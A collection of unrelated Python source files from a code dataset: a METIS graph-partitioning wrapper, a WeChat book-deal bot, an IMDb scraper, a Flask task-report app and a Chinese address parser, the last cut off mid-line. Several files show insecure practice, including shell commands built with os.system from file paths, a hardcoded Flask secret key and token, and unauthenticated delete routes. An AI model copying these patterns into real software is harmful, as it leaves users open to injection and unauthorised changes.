<<= nm.msortf(f=\"__num\",o=xxnum2nam)\n\t\tfmap.run()\n\n\t\t# 節点ファイルが指定された場合は枝ファイルとの整合性チェック\n\t\tif self.nFile :\n\t\t\tncheck = nm.mcut(f=\"__node1:__node\" , i=xxedge)\n\t\t\tncheck <<= nm.mcommon(k=\"__node\" , m=xxnam2num,r=True)\n\t\t\tnmatch = ncheck.run()\n\t\t\tif len(nmatch) > 0 :\n\t\t\t\traise Exception(\"#ERROR# the node named '%s' in the edge file doesn't exist in the node file.\"%(nmatch[0][0]))\n\n\n\t\t# metisのグラフファイルフォーマット\n\t\t# 先頭行n m [fmt] [ncon]\n\t\t# n: 節点数、m:枝数、ncon: 節点weightの数\n\t\t# 1xx: 節点サイズ有り (not used, meaning always \"0\")\n\t\t# x1x: 節点weight有り\n\t\t# xx1: 枝がweightを有り\n\t\t# s w_1 w_2 ... w_ncon v_1 e_1 v_2 e_2 ... v_k e_k\n\t\t# s: 節点サイズ (節点サイズは利用不可)\n\t\t# w_x: 節点weight\n\t\t# v_x: 接続のある節点番号(行番号)\n\t\t# e_x: 枝weight\n\n\t\t# --------------------\n\t\t# generate edge data using the integer numbered nodes\n\t\t#fnnum = None\n\t\tfnnum = nm.mcut(f=\"__num:__node_n1\",i=xxnam2num) # {xxnnum}\n\n\t\tfenum = None\n\t\tfenum <<= nm.mjoin(k=\"__node1\", K=\"__node\", f=\"__num:__node_n1\", m=xxnam2num , i=xxedge)\n\t\tfenum <<= nm.mjoin(k=\"__node2\", K=\"__node\", f=\"__num:__node_n2\", m=xxnam2num)\n\t\tfenum <<= nm.msortf(f=\"__node_n1\") #{xxenum}\n\n\n\n\t\tfebase = None\n\t\tfebase <<= nm.mnjoin(k=\"__node_n1\",m=fenum,i=fnnum,n=True)\n\t\tfebase <<= nm.msortf(f=\"__node_n1%n,__node_n2%n\",o=xxebase) #{xxebase}\"\n\t\tfebase.run()\n\t\t\n\t\tfbody = None\n\t\tif not self.ew :\n\t\t\tfbody <<= nm.mcut(f=\"__node_n1,__node_n2\", i=xxebase)\n\t\t\tfbody <<= nm.mtra(k=\"__node_n1\",f=\"__node_n2\" ,q=True )\n\t\t\tfbody <<= nm.mcut(f=\"__node_n2\", nfno=True, o=xxbody)\n\n\t\t# if ew= is specified, merge the weight data into the edge data.\n\t\telse:\n\t\t\tfebody = None\n\t\t\tfebody <<= nm.mcut(f=\"__node_n1,__node_n2:__v\", i=xxebase)\n\t\t\tfebody <<= nm.mnumber(S=0,I=2,a=\"__seq\" ,q=True)\n\t\t\n\t\t\tfwbody = None\n\t\t\tfwbody <<= nm.mcut(f=\"__node_n1,__weight:__v\",i=xxebase)\n\t\t\tfwbody <<= nm.mnumber(S=1,I=2,a=\"__seq\" ,q=True)\n\n\t\t\tfbody <<= nm.msortf(f=\"__seq%n\",i=[febody,fwbody])\n\t\t\tfbody <<= nm.mtra(k=\"__node_n1\" ,f=\"__v\" ,q=True )\n\t\t\tfbody <<= nm.mcut(f=\"__v\" ,nfno=True,o=xxbody)\n\n\t\tfbody.run()\n\t\t# xxbody\n\t\t# 2 7 3 8 5 9\n\t\t# 1 7 3 10 5 11 7 12\n\t\t# 1 8 2 10 4 13 7 14\n\n\t\t# --------------------\n\t\t# generate node data using integer number\n\t\tif self.nFile and self.nw :\n\t\t\t# xxnode\n\t\t\t# __node,v1,v2\n\t\t\t# a,1,1\n\t\t\t# b,1,1\n\t\t\t# c,1,1\n\t\t\txxnbody = temp.file()\n\t\t\txxnbody1 = temp.file()\n\t\t\tfnbody = None\n\t\t\tfnbody <<= nm.mjoin(k=\"__node\", f=\"__num\", i=xxnode ,m=xxnam2num)\n\t\t\tfnbody <<= nm.msortf(f=\"__num%n\")\n\t\t\tfnbody <<= nm.mcut(f=self.nw,nfno=True)\n\t\t\tfnbody <<= nm.cmd(\"tr ',' ' ' \") # tricky!!\n\t\t\tfnbody <<= nm.mwrite(o=xxnbody)\n\t\t\tfnbody.run()\n\t\t\t# xxnbody\n\t\t\t# 1 1\n\t\t\t# 1 1\n\t\t\t# 1 1\n\t\t\t# paste the node weight with edge body\n\t\t\tfnbody1 = None\n\t\t\tfnbody1 <<= nm.mpaste(nfn=True,m=xxbody , i=xxnbody)\n\t\t\tfnbody1 <<= nm.cmd(\"tr ',' ' ' \") \n\t\t\tfnbody1 <<= nm.mwrite(o=xxnbody1)\n\t\t\tfnbody1.run()\n\t\t\tos.system(\"mv %s %s\"%(xxnbody1,xxbody))\n\n\t\t# xxbody\n\t\t# 1 1 2 7 3 8 5 9\n\t\t# 1 1 1 7 3 10 5 11 7 12\n\t\t# 1 1 1 8 2 10 4 13 7 14\n\n\n\t\teSize=mrecount(i=xxedge)\n\t\teSize/=2\n\t\tnSize=mrecount(i=xxnode)\n\t\tnwFlag = 1 if self.nw else 0\n\t\tewFlag = 1 if self.ew else 0\n\t\t\n\t\tfmt=\"0%d%d\"%(nwFlag,ewFlag)\n\n\t\txxhead = temp.file()\n\t\txxgraph= temp.file()\n\t\t\t\t\n\t\tos.system(\"echo '%d %d %s %d' > %s\"%(nSize,eSize,fmt,self.ncon,xxhead))\n\t\tos.system(\"cat %s %s > %s\"%(xxhead,xxbody,xxgraph))\n\n\t\tif self.mFile :\n\t\t\tnm.mfldname(f=\"__num:num,__node:node\",i=xxnum2nam,o=self.mFile).run()\n\t\t\t\n\t\tif self.dFile :\n\t\t\tos.system(\"cp %s %s\"%(xxgraph,self.dFile))\n\t\t\t\n\t\tif not self.noexe:\n\t\t\tif self.verbose :\n\t\t\t\tos.system(\"gpmetis -seed=%d -ptype=%s -ncuts=%d -ufactor=%d %s %d\"%(self.seed,self.ptype,self.ncuts,self.ufactor,xxgraph,self.kway))\n\t\t\telse:\n\t\t\t\tos.system(\"gpmetis -seed=%d -ptype=%s -ncuts=%d -ufactor=%d %s %d > /dev/null\"%(self.seed,self.ptype,self.ncuts,self.ufactor,xxgraph,self.kway))\n\t\t\timport glob\n\t\t\tif len(glob.glob(xxgraph+\".part.*\")) == 0:\n\t\t\t\traise Exception(\"#ERROR# command `gpmetis' didn't output any results\")\n\n\t\t\t# 節点名を数字から元に戻す\n\t\t\t# #{xxgraph}.part.#{kway}\n\t\t\t# 1\n\t\t\t# 0\n\t\t\t# 1\n\t\t\tfo = None\t\n\t\t\tfo <<= nm.mcut(f=\"0:cluster\", nfni=True,i=xxgraph+\".part.\"+str(self.kway))\n\t\t\tfo <<= nm.mnumber(S=1,a=\"__num\",q=True)\n\t\t\tfo <<= nm.mjoin(k=\"__num\",f=\"__node\",m= xxnum2nam)\n\t\t\tfo <<= nm.msortf(f=\"__node,cluster\")\n\t\t\tif self.nf :\n\t\t\t\tfo <<= nm.mcut(f=\"__node:%s,cluster\"%(self.nf),o=self.oFile)\n\t\t\telse:\n\t\t\t\tfo <<= nm.mcut(f=\"__node:node,cluster\",o=self.oFile)\n\t\t\tfo.run()\n\n\t\tnu.mmsg.endLog(self.__cmdline())\n","sub_path":"nysol/mining/mgpmetis.py","file_name":"mgpmetis.py","file_ext":"py","file_size_in_byte":11910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"572907644","text":"\"\"\"\nGFS data translation handlers\n\"\"\"\n\n# mypy: ignore-errors\n\nraise NotImplementedError()\n\nfrom typing import List\n\nimport avwx.parsing.translate.base as _trans\nfrom avwx.structs import (\n GfsPeriod,\n GfsPeriodTrans,\n MavData,\n MavPeriodTrans,\n MexData,\n MexPeriodTrans,\n Units,\n)\n\n\ndef _gfs_shared(\n line: GfsPeriod, units: Units, dataobj: GfsPeriodTrans\n) -> GfsPeriodTrans:\n \"\"\"\"\"\"\n data = {}\n data[\"temperature\"] = _trans.temperature(line.temperature, units.temperature)\n data[\"dewpoint\"] = _trans.temperature(line.dewpoint, units.temperature)\n data[\"cloud\"] = None\n return dataobj(**data)\n\n\ndef translate_mav(wxdata: MavData, units: Units) -> List[MavPeriodTrans]:\n \"\"\"Returns translations for a TafData object\"\"\"\n data = []\n for line in wxdata.forecast:\n _data = _gfs_shared(line, units, MavPeriodTrans)\n return data\n\n\ndef translate_mex(wxdata: MexData, units: Units) -> List[MexPeriodTrans]:\n \"\"\"Returns translations for a TafData object\"\"\"\n data = []\n return data\n","sub_path":"avwx/parsing/translate/gfs.py","file_name":"gfs.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"653955123","text":"# -*- coding: utf-8 -*-\nimport hashlib\nimport web\nimport lxml\nimport time\nimport os\nimport json\nimport requests\nfrom lxml import etree\n\nfrom HTMLParser import HTMLParser\n\nresult = {\"name\": [], \"cover\": [], \"desc\": [], \"link\": []}\n\ndef get_page():\n\thtml = requests.get(\"http://t.cn/Rvm4xgc\").text\n\tlength = len(html)\n\tcount = 0\n\tfor i in range(0, length-4):\n\t\tif html[i] == '<' and html[i+1] == 't' and html[i+2] == 'a' and html[i+3] == 'b':\n\t\t\tcount += 1\n\t\t\tif count == 7:\n\t\t\t\tbreak\n\tstart = i\n\tfor j in range(i, length-4):\n\t\tif html[j] == 'b' and html[j+1] == 'l' and html[j+2] == 'e' and html[j+3] == '>':\n\t\t\tbreak\n\tend = j+4\n\treturn html[start:end]\n\nclass MyHTMLParser(HTMLParser):\n\tdef __init__(self): \n\t\tHTMLParser.__init__(self) \n\t\tself.tdcount = 0\n\t\tself.imgcount = 0\n\t\tself.acount = 0\n\tdef handle_starttag(self, tag, attrs):\n\t\tif tag == 'td':\n\t\t\tself.tdcount += 1\n\t\tif tag == 'img':\n\t\t\tself.imgcount += 1\n\t\t\tif self.imgcount == 1 or self.imgcount == 3:\n\t\t\t\tfor (variable, value) in attrs:\n\t\t\t\t\tif variable == \"src\":\n\t\t\t\t\t\tresult[\"cover\"].append(value)\n\t\tif tag == 'a':\n\t\t\tself.acount += 1\n\t\t\tif self.acount == 3 or self.acount == 5:\n\t\t\t\tfor (variable, value) in attrs:\n\t\t\t\t\tif variable == \"href\":\n\t\t\t\t\t\tresult[\"link\"].append(\"http://www.amazon.cn\" + value)\n\tdef handle_data(self, data):\n\t\tif self.tdcount == 2 or self.tdcount == 4:\n\t\t\tresult[\"name\"].append(data)\n\t\tif self.tdcount == 5 or self.tdcount == 7:\n\t\t\tpos = data.find('')\n\t\t\tresult[\"desc\"].append(data[0:pos])\n\ndef parse(html):\n\tparser = MyHTMLParser()\n\tparser.feed(html)\n\ndef build_html():\n\treturn '' \\\n\t\t\t+ '

'+ result[\"name\"][0] + '  ' + result[\"desc\"][2] + '

' \\\n\t\t\t+ '' \\\n\t\t\t+ '' \\\n\t\t\t+ '' \\\n\t\t\t+ '

' + result[\"desc\"][0] + '

' \\\n\t\t\t+ '

'+ result[\"name\"][1] + '  ' + result[\"desc\"][5] + '

' \\\n\t\t\t+ '' \\\n\t\t\t+ '' \\\n\t\t\t+ '' \\\n\t\t\t+ '

' + result[\"desc\"][3] + '

' \\\n\t\t\t+ ''\n\nclass WeixinInterface:\n\tdef __init__(self):\n\t\tself.app_root = os.path.dirname(__file__)\n\t\tself.templates_root = os.path.join(self.app_root, 'templates')\n\t\tself.render = web.template.render(self.templates_root)\n\tdef GET(self):\n\t\t#获取输入参数\n\t\tdata = web.input()\n\t\tsignature=data.signature\n\t\ttimestamp=data.timestamp\n\t\tnonce=data.nonce\n\t\techostr=data.echostr\n\t\t#自己的token\n\t\ttoken=\"gcc2012\" #这里改写你在微信公众平台里输入的token\n\t\t#字典序排序\n\t\tlist=[token,timestamp,nonce]\n\t\tlist.sort()\n\t\tsha1=hashlib.sha1()\n\t\tmap(sha1.update,list)\n\t\thashcode=sha1.hexdigest()\n\t\t#sha1加密算法 \n\n\t\t#如果是来自微信的请求,则回复echostr\n\t\tif hashcode == signature:\n\t\t\treturn echostr\n\tdef POST(self): \n\t\t#接收微信的请求内容\n\t\tdata = web.data()\n\t\t#解析XML内容\n\t\troot = etree.fromstring( data )\n\t\tchild = list( root )\n\t\trecv = {}\n\t\tfor i in child:\n\t\t\trecv[i.tag] = i.text\n\t\t\n\t\ttextxml = \"\"\"\n\t\t\t\n\t\t\t\n\t\t\t%s\n\t\t\t\n\t\t\t\t\n\t\t\t\"\"\"\n\n\t\tif recv['MsgType'] == 'event':\n\t\t\tif recv['Event'] == 'subscribe':\n\t\t\t\twelcome = 'Thanks to follow, reply any text to view Kindle special books today!'\n\t\t\t\treturn textxml % (recv['FromUserName'], recv['ToUserName'],recv['CreateTime'],welcome)\n\n\t\ttextandpic = \"\"\"\n\t\t\t\n\t\t\t\n\t\t\t%s\n\t\t\t\n\t\t\t2\n\t\t\t\n\t\t\t\n\t\t\t<![CDATA[%s]]> \n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t<![CDATA[%s]]> \n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\n\t\t\t\"\"\"\n\t\tparse(get_page())\n\t\techostr = textandpic % (recv['FromUserName'], recv['ToUserName'],recv['CreateTime'], result[\"name\"][0], result[\"desc\"][0], result[\"cover\"][0], result[\"link\"][0], result[\"name\"][1], result[\"desc\"][1], result[\"cover\"][1], result[\"link\"][1])\n\t\treturn echostr\n\n\n\n","sub_path":"weixinInterface.py","file_name":"weixinInterface.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"235155068","text":"from typing import List\n\n\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n def make_adjacent_zero(i, j, row_len, col_len):\n grid[i][j] = 0\n # up\n if i > 0 and grid[i - 1][j] == '1':\n make_adjacent_zero(i - 1, j, row_len, col_len)\n # down\n if i < row_len - 1 and grid[i + 1][j] == '1':\n make_adjacent_zero(i + 1, j, row_len, col_len)\n # left\n if j > 0 and grid[i][j - 1] == '1':\n make_adjacent_zero(i, j - 1, row_len, col_len)\n # right\n if j < col_len - 1 and grid[i][j + 1] == '1':\n make_adjacent_zero(i, j + 1, row_len, col_len)\n\n count = 0\n row_len, col_len = len(grid), len(grid[0]) if len(grid) > 0 else 0\n for i in range(row_len):\n for j in range(col_len):\n if grid[i][j] == '1':\n count += 1\n make_adjacent_zero(i, j, row_len, col_len)\n return count\n\n\ninput = \"\"\"\"\"\"\ninput = input.split('\\n')\ninput = [list(row) for row in input]\nfor i in input:\n for j in i:\n print(j, sep='', end='')\n print('\\n')\nprint(Solution().numIslands(input))\n\n","sub_path":"leetcode-journey/0200_number_of_islands_medium.py","file_name":"0200_number_of_islands_medium.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"602861074","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef extract(url):\r\n\treq = requests.get(url)\r\n\tsoup = BeautifulSoup(req.content,'html.parser')\r\n\r\n\tlis = soup.find('div',{\"class\":\"lister-list\"}).findAll('div',{\"class\":\"lister-item\"})\r\n\r\n\tyear = soup.find('h3',{\"class\":\"lister-item-header\"}).findAll('span',{\"class\":\"lister-item-index\"})\r\n\tfor yr in year:\r\n\t\tprint (yr)\r\n\r\n\tlist_movies = []\r\n\r\n\tfor item in lis:\r\n\t\tmovie = {}\r\n\t\t#movie['number'] = item.find('div',{\"class\":\"lister-item-content\"}).findAll('span',{\"class\":\"lister-item-index\"},text=True)\r\n\t\t#movie['number'] = item.find('span',{\"class\":\"lister-item-index\"}).findAll(text=True)\r\n\t\tmovie['title'] = item.h3.a.text\r\n\t\tmovie['number'] = item.find('span',{\"class\":\"lister-item-year\"})\r\n\t\t#movie['desc'] =_all\r\n\t\t#movi[0]e['desc']['cert'] = item.find('p',{\"class\":\"text-muted\"}).findAll('span',{\"class\":\"certificate\"})\r\n\t\tlist_movies.append(movie)\r\n\r\n\tprint (list_movies)\r\n\r\nif __name__=='__main__':\r\n\turl = 'http://www.imdb.com/search/title?count=100&title_type=feature,tv_series&ref_=nv_wl_img_2'\r\n\textract(url)\r\n\r\n","sub_path":"extract_movies.py","file_name":"extract_movies.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"302913064","text":"from flask import Flask,render_template,url_for,request,redirect,make_response\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_login import LoginManager,login_required\r\nfrom datetime import datetime\r\n\r\n\r\napp=Flask(__name__)\r\n\r\napp.secret_key=\"super secret key\"\r\napp.config['SQLALCHEMY_DATABASE_URI']='sqlite:///Syukanmanage.db'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False\r\n\r\ndb=SQLAlchemy(app)\r\n\r\nlogin_manager=LoginManager()\r\nlogin_manager.login_view='auth.login'\r\nlogin_manager.init_app(app)\r\n\r\nfrom app.models.user import User\r\nfrom app.models.task import Post,Report\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return User.query.get(int(user_id))\r\n\r\nfrom app.views.auth import auth\r\napp.register_blueprint(auth)\r\nfrom app.report_check import rcheck\r\napp.register_blueprint(rcheck)\r\nfrom app.reportgraph import graph\r\napp.register_blueprint(graph)\r\n\r\n@app.route('/',methods=['GET','POST'])\r\n@login_required\r\ndef index():\r\n if request.method=='GET':\r\n posts=Post.query.order_by(Post.due).all()\r\n return render_template('index.html',posts=posts)\r\n else:\r\n title=request.form.get('title')\r\n detail=request.form.get('detail')\r\n due=request.form.get('due')\r\n name=request.form.get('name')\r\n\r\n due=datetime.strptime(due,'%Y-%m-%d')\r\n new_post=Post(title=title,detail=detail,due=due,name=name)\r\n\r\n db.session.add(new_post)\r\n db.session.commit()\r\n\r\n return redirect('/')\r\n\r\n\r\n@app.route('/report/',methods=['GET','POST'])\r\ndef report(id):\r\n post=Post.query.get(id)\r\n report=Report.query.get(id)\r\n if request.method=='GET':\r\n post=Post.query.get(id)\r\n return render_template('report.html',post=post)\r\n else:\r\n date=request.form.get('date')\r\n comment=request.form.get('comment')\r\n times=request.form.get('times')\r\n date=datetime.strptime(date,'%Y-%m-%d')\r\n name=request.form.get('name')\r\n pid=post.id\r\n\r\n new_report=Report(date=date,comment=comment,times=times,name=name,pid=pid)\r\n\r\n db.session.add(new_report)\r\n db.session.commit()\r\n return redirect('/')\r\n return render_template('detail.html',post=post)\r\n\r\n\r\n@app.route('/create')\r\ndef create():\r\n return render_template('create.html')\r\n\r\n@app.route('/detail/')\r\ndef read(id):\r\n post=Post.query.get(id)\r\n return render_template('detail.html',post=post)\r\n\r\n@app.route('/update/',methods=['GET','POST'])\r\ndef update(id):\r\n post=Post.query.get(id)\r\n if request.method=='GET':\r\n return render_template('update.html',post=post)\r\n else:\r\n post.title=request.form.get('title')\r\n post.detail=request.form.get('detail')\r\n post.due=datetime.strptime(request.form.get('due'),'%Y-%m-%d')\r\n post.name=request.form.get('name')\r\n\r\n db.session.commit()\r\n return redirect('/')\r\n return render_template('detail.html',post=post)\r\n\r\n@app.route('/delete/')\r\ndef delete(id):\r\n post=Post.query.get(id)\r\n\r\n db.session.delete(post)\r\n db.session.commit()\r\n return redirect('/')\r\n\r\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"448598970","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\nprovince_list = ['江苏', '重庆市', '天津', '河南省', '辽宁省', '云南省', '吉林', '黑龙江', '重庆', '甘肃省', '江西', '广东省', '福建省', '新疆维吾尔自治区',\n '浙江', '湖南', '上海市', '山东省', '福建', '黑龙江省', '海南', '浙江省', '湖北省', '安徽', '四川', '香港特别行政区', '青海', '台湾省', '河北',\n '云南', '山西省', '广西壮族自治区', '四川省', '吉林省', '西藏自治区', '河南', '上海', '山西', '江苏省', '台湾', '山东', '陕西', '江西省',\n '甘肃', '陕西省', '贵州', '内蒙古自治区', '天津市', '青海省', '宁夏回族自治区', '辽宁', '贵州省', '澳门特别行政区', '安徽省', '湖北', '湖南省',\n '北京', '河北省', '海南省', '广东', '北京市', '宁夏', '澳门', '新疆', '广西', '内蒙古', '西藏', '香港', '湖北省']\ncity_list = ['泉州市', '肇庆市', '抚州市', '日照市', '乌兰察布市', '金昌市', '赣州市', '榆林市', '吉林市', '黑河市', '韶关市', '三沙市', '桂林市', '黄山市',\n '常州市', '喀什地区', '沧州市', '鸡西市', '扬州市', '贵阳市', '济宁市', '武汉市', '日喀则市', '九江市', '保山市', '景德镇市', '成都市', '松原市',\n '梅州市', '巴中市', '阜阳市', '南平市', '金华市', '锡林郭勒盟', '丽江市', '荆州市', '湘西土家族苗族自治州', '玉林市', '驻马店市', '通辽市', '延边朝鲜族自治州',\n '乌海市', '马鞍山市', '临沂市', '昌吉回族自治州', '大庆市', '镇江市', '乐山市', '潍坊市', '铜川市', '和田地区', '黄南藏族自治州', '遵义市', '广安市',\n '威海市', '厦门市', '庆阳市', '红河哈尼族彝族自治州', '咸宁市', '临夏回族自治州', '合肥市', '鞍山市', '巴彦淖尔市', '中卫市', '盐城市', '滁州市', '六盘水市',\n '达州市', '大兴安岭地区', '舟山市', '梧州市', '崇左市', '吐鲁番市', '呼和浩特市', '中山市', '海西蒙古族藏族自治州', '运城市', '吉安市', '汕尾市', '延安市',\n '毕节市', '楚雄彝族自治州', '安阳市', '广州市', '河源市', '新余市', '天水市', '清远市', '石嘴山市', '鹤壁市', '聊城市', '黔东南苗族侗族自治州', '宿州市',\n '衡水市', '宣城市', '安顺市', '北京市', '恩施土家族苗族自治州', '重庆市', '亳州市', '酒泉市', '赤峰市', '宜宾市', '德宏傣族景颇族自治州', '常德市', '丽水市',\n '资阳市', '长治市', '无锡市', '博尔塔拉蒙古自治州', '菏泽市', '荆门市', '天津市', '辽源市', '雅安市', '牡丹江市', '襄阳市', '大同市', '随州市', '兰州市',\n '郴州市', '信阳市', '甘南藏族自治州', '淮南市', '郑州市', '平顶山市', '龙岩市', '焦作市', '双鸭山市', '百色市', '南通市', '白城市', '池州市', '汉中市',\n '自贡市', '盘锦市', '沈阳市', '普洱市', '遂宁市', '邢台市', '儋州市', '杭州市', '苏州市', '衡阳市', '淮北市', '承德市', '海北藏族自治州', '定西市',\n '通化市', '文山壮族苗族自治州', '吴忠市', '云浮市', '南昌市', '商洛市', '武威市', '宿迁市', '铜仁市', '惠州市', '银川市', '德阳市', '十堰市', '阿拉善盟',\n '长春市', '巴音郭楞蒙古自治州', '曲靖市', '阿克苏地区', '岳阳市', '防城港市', '朝阳市', '益阳市', '贵港市', '凉山彝族自治州', '白银市', '嘉峪关市', '莆田市',\n '温州市', '德州市', '烟台市', '来宾市', '咸阳市', '那曲市', '齐齐哈尔市', '滨州市', '珠海市', '潮州市', '怀化市', '永州市', '上饶市', '伊犁哈萨克自治州',\n '汕头市', '晋城市', '兴安盟', '廊坊市', '上海市', '渭南市', '东莞市', '周口市', '湖州市', '株洲市', '甘孜藏族自治州', '佛山市', '绥化市', '泸州市',\n '昌都市', '徐州市', '攀枝花市', '抚顺市', '湛江市', '铜陵市', '淮安市', '石家庄市', '平凉市', '本溪市', '哈密市', '营口市', '台州市', '黄��市',\n '宁波市', '萍乡市', '玉树藏族自治州', '固原市', '芜湖市', '黄冈市', '朔州市', '南宁市', '临汾市', '深圳市', '阜新市', '青岛市', '柳州市', '商丘市',\n '忻州市', '洛阳市', '南京市', '海东市', '眉山市', '钦州市', '娄底市', '海南藏族自治州', '鄂州市', '三亚市', '莱芜市', '宁德市', '嘉兴市', '吕梁市',\n '迪庆藏族自治州', '邵阳市', '香港特别行政区', '拉萨市', '张家界市', '太原市', '克拉玛依市', '西双版纳傣族自治州', '濮阳市', '河池市', '晋中市', '鹰潭市',\n '丹东市', '陇南市', '长沙市', '许昌市', '张掖市', '唐山市', '安康市', '贺州市', '蚌埠市', '孝感市', '宜春市', '铁岭市', '怒江傈僳族自治州', '六安市',\n '东营市', '澳门特别行政区', '黔南布依族苗族自治州', '三明市', '衢州市', '阿里地区', '漯河市', '茂名市', '泰安市', '广元市', '昭通市', '新乡市', '安庆市',\n '枣庄市', '北海市', '塔城地区', '阿勒泰地区', '七台河市', '海口市', '开封市', '乌鲁木齐市', '秦皇岛市', '佳木斯市', '阳江市', '邯郸市', '张家口市',\n '包头市', '哈尔滨市', '保定市', '泰州市', '阳泉市', '克孜勒苏柯尔克孜自治州', '林芝市', '淄博市', '江门市', '湘潭市', '大连市', '伊春市', '三门峡市',\n '内江市', '南充市', '黔西南布依族苗族自治州', '大理白族自治州', '阿坝藏族羌族自治州', '福州市', '锦州市', '鄂尔多斯市', '鹤岗市', '临沧市', '济南市', '绍兴市',\n '玉溪市', '宜昌市', '宝鸡市', '南阳市', '揭阳市', '辽阳市', '四平市', '西安市', '昆明市', '漳州市', '西宁市', '果洛藏族自治州', '绵阳市', '山南市',\n '葫芦岛市', '泉州', '肇庆', '抚州', '日照', '乌兰察布', '金昌', '赣州', '榆林', '吉林', '黑河', '韶关', '三沙', '桂林', '黄山', '常州', '沧州',\n '鸡西', '扬州', '贵阳', '济宁', '武汉', '日喀则', '九江', '保山', '景德镇', '成都', '松原', '梅州', '巴中', '阜阳', '南平', '金华', '丽江',\n '荆州', '玉林', '驻马店', '通辽', '乌海', '马鞍山', '临沂', '大庆', '镇江', '乐山', '潍坊', '铜川', '遵义', '广安', '威海', '厦门', '庆阳',\n '咸宁', '合肥', '鞍山', '巴彦淖尔', '中卫', '盐城', '滁州', '六盘水', '达州', '舟山', '梧州', '崇左', '吐鲁番', '呼和浩特', '中山', '运城',\n '吉安', '汕尾', '延安', '毕节', '安阳', '广州', '河源', '新余', '天水', '清远', '石嘴山', '鹤壁', '聊城', '宿州', '衡水', '宣城', '安顺',\n '北京', '重庆', '亳州', '酒泉', '赤峰', '宜宾', '常德', '丽水', '资阳', '长治', '无锡', '菏泽', '荆门', '天津', '辽源', '雅安', '牡丹江',\n '襄阳', '大同', '随州', '兰州', '郴州', '信阳', '淮南', '郑州', '平顶山', '龙岩', '焦作', '双鸭山', '百色', '南通', '白城', '池州', '汉中',\n '自贡', '盘锦', '沈阳', '普洱', '遂宁', '邢台', '儋州', '杭州', '苏州', '衡阳', '淮北', '承德', '定西', '通化', '吴忠', '云浮', '南昌',\n '商洛', '武威', '宿迁', '铜仁', '惠州', '银川', '德阳', '十堰', '长春', '曲靖', '岳阳', '防城港', '朝阳', '益阳', '贵港', '白银', '嘉峪关',\n '莆田', '温州', '德州', '烟台', '来宾', '咸阳', '那曲', '齐齐哈尔', '滨州', '珠海', '潮州', '怀化', '永州', '上饶', '汕头', '晋城', '廊坊',\n '上海', '渭南', '东莞', '周口', '湖州', '株洲', '佛山', '绥化', '泸州', '昌都', '徐州', '攀枝花', '抚顺', '湛江', '铜陵', '淮安', '石家庄',\n '平凉', '本溪', '哈密', '营口', '台州', '黄石', '宁波', '萍乡', '固原', '芜湖', '黄冈', '朔州', '南宁', '临汾', '深圳', '阜新', '青岛',\n '柳州', '商丘', '忻州', '洛阳', '南京', '海东', '眉山', '钦州', '娄底', '鄂州', '三亚', '莱芜', '宁德', '嘉兴', '吕梁', '邵阳', '拉萨',\n '张家界', '太原', '克拉玛依', '濮阳', '河池', '晋中', '鹰潭', '丹东', '陇南', '长沙', '许昌', '张掖', '唐山', '安康', '贺州', '蚌埠', '孝感',\n '宜春', '铁岭', '六安', '东营', '三明', '衢州', '漯河', '茂名', '泰安', '广元', '昭通', '新乡', '安庆', '枣庄', '北海', '七台河', '海口',\n '开封', '乌鲁木齐', '秦皇岛', '佳木斯', '阳江', '邯郸', '张家口', '包头', '哈尔滨', '保定', '泰州', '阳泉', '林芝', '淄博', '江门', '湘潭',\n '大连', '伊春', '三门峡', '内江', '南充', '福州', '锦州', '鄂尔多斯', '鹤岗', '临沧', '济南', '绍兴', '玉溪', '宜昌', '宝鸡', '南阳', '揭阳',\n '辽阳', '四平', '西安', '昆明', '漳州', '西宁', '绵阳', '山南', '葫芦岛']\n#提取姓名\ndef getname(line):\n name = re.search(r'^[\\u4e00-\\u9fa5]{2,5}', line)\n return name\n#提取电话号码\ndef getphone(line):\n phone = re.search('(\\d{11})', line)\n return phone\n#提取地址\ndef getaddress(line,name,phone):\n if(name):\n address = re.sub(name.group(), '', line)\n address = re.sub(',', '', address)\n address = re.sub('\\.', '', address)\n address = re.sub(phone.group(), '', address)\n return address\n#对地址进行分类\ndef addr(address, name, phone):\n#分化省级\n province = re.search('[\\u4e00-\\u9fa5]{2,7}?(?:省|自治区)', address)\n Isprovince = 0\n if (province != None):\n length = len(province.group())\n loc = address.find(province.group())\n address2 = address[loc+length:]\n province = province.group()\n else:\n for state in province_list:\n if (re.search(state, address) != None):\n break\n if (re.search(state, address) == None):\n Isprovince = 1\n length = len(state)\n loc = address.find(state)\n address2 = address[loc + length:]\n if state == \"北京\" or state == \"上海\" or state == \"天津\" or state == \"重庆\" or state == \"北京市\" or state == \"上海市\" or state == \"天津市\" or state == \"重庆市\":\n if len(address) < 3 or address[2] != \"市\":\n address = address[:2] + \"市\" + address[2:]\n else :\n state = state[:2]\n province = state\n address2 = address\n elif state == \"澳门\" or state == \"香港\" :\n state = state + \"特别行政区\" \n province = state\n elif state == \"澳门特别行政区\" or state == \"香港特别行政区\":\n province = state\n elif state == \"宁夏\" or state == \"新疆\" or state == \"西藏\" or state == \"内蒙古\" or state == \"广西壮族自治区\" or state == \"新疆维吾尔自治区\" or state == \"西藏自治区\" or state == \"内蒙古自治区\":\n if state[-1] != \"区\":\n if state[1] == \"藏\":\n state = state + '自治区'\n if state[1] == \"西\":\n state = state + 